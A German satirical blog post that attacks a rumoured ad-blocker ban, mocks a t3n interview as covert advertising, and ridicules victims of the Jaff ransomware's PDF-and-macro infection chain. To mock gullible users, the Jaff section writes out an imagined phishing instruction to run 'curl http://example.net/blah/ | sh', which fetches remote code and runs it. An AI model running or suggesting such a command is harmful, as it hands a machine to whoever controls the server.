Es scheint so weit zu sein…

In der BRD liegt ein gesetzliches verbot von adblockern in der luft

Die arschlöcher von presseverlegern, die so etwas in den dunkelkammern des reichstages anleiern, sind nun einmal nichts anderes als eure feinde. Ob eure kompjuter von irgendwelchen kriminellen gepwnt werden, ist denen scheißegal, so lange nur ihr geschäftchen läuft.

Wie man immer beim bullschittbingo gewinnt

Diese t3n-schleichwerbung im redakzjonellen teil mit einem tollen interwjuh mit Daniel Krantz, dem leiter irgendeiner entwicklungsabteilung beim lotto-versand ist eine gewinngarantie bei jeder runde bullschitt-bingo. Da kriegt man nicht nur eine reihe voll, da kriegt man blitzeschnell ganze karten mit voll. Der lässt nix aus! :mrgreen:

Hier nur als anregendes appetithäppchen die erste antwort von Daniel Krantz:

Wir haben ein modulares System entwickelt. Dazu haben wir das App Acceleration Center etabliert und können so binnen acht Wochen eine neue App umsetzen. Wir fahren also in der gesamten Otto Group einen Open-Source-Ansatz. Heißt: Wir entwickeln modulare Features, die dann jede Gesellschaft innerhalb des Konzerns übernehmen kann. Die Basis für die Apps bilden dabei meist die Responsive Websites

Das wird noch viel leckerer im verlaufe des textes.

Zu schade, dass t3n so eine völlig unrelativierte schleichwerbekacke nötig zu haben glaubt, aber hej, dann kommt halt bald der insolvenzverwalter, das ist nicht mein problem…

Sicherheitsproblem des tages

Wer auf die Mail hereinfällt und das PDF öffnet, fängt sich Jaff aber noch nicht ein. Erst muss man in der PDF-Anwendung eine Sicherheitswarnung mit einem Klick auf „OK“ abnicken. Anschließend wird ein Word-Dokument mit Makros aus dem PDF extrahiert und geöffnet. Nun muss ein Opfer noch die Makros aktivieren. Erst dann findet die Infektion mit Jaff statt

Sorry, aber wer das macht, kann auf mein mitleid nicht mehr rechnen. Nach so viel mühe hat man sich den erpressungstrojaner aber auf anständige weise selbst verdient. Bei so viel konzentriertem informazjonstechnischen analfabetismus an den tasten hilft auch das sicherste betrübssystem nicht weiter. Wenn man derartige vollpfosten etwa vor einem un*xoiden system setzt und die kriegen da eine spämm mit dem text: „unser voll sicheres sicherheitsverfahren zur erhöhung der sicherheit erfordert eine aktivierung an ihrer kommandozeile, damit sie die angehängten dokumente lesen können, bitte geben sie die anweisung curl http://example.net/blah/ | sh in einer konsole ein! Vielen dank für ihr verständnis!“ — die machen das! Und die kommen sich dabei noch wichtig und kompedingsda vor, weil sie eine tolle, sichere sicherheitszeile von hand abtippen können. (Das mit der zwischenablage werden sie wohl nicht verstehen, und dass man unter X seit rd. 25 jahren einfach mit der mittleren maustaste den woanders markierten text einfügen könnte, wissen sie auch nicht und werden sie auch nie lernen, denn sie brauchen es ja nicht zu wissen.) Die größte sicherheitslücke ist immer noch der digitale analfabet vor dem kompjuter, und dieser analfabet wird mit hohem aufwand systematisch hergestellt, weil man verdummten menschen, die angst vor eigenem wissen und können haben, einfach viel mehr zeugs verkaufen kann. Wischofone zum beispiel. Oder antivirus-schlangenöle. Oder lichtschalter mit internetz. Ach!

Nicht daten sind der rohstoff der zukunft. Dummheit ist der rohstoff der zukunft.

Ach, apropo dummheit: Warum — und vor allem wozu — im namen von drei schwefelkackenden höllenhunden kann man an ein PDF-dokument ein wörd-dokument anhängen? Was ist der intendierte anwendungsfall für dieses funkzjonsmerkmal? Und wie oft wird dieses funkzjonsmerkmal von anwendern genutzt? Wer sinnlos aufgeplusterte softwäjhr von klischen wie „adobe“ (engl. für: gebrannter lehmziegel) benutzt, setzt sich damit auch ziemlich überflüssigen risiken aus.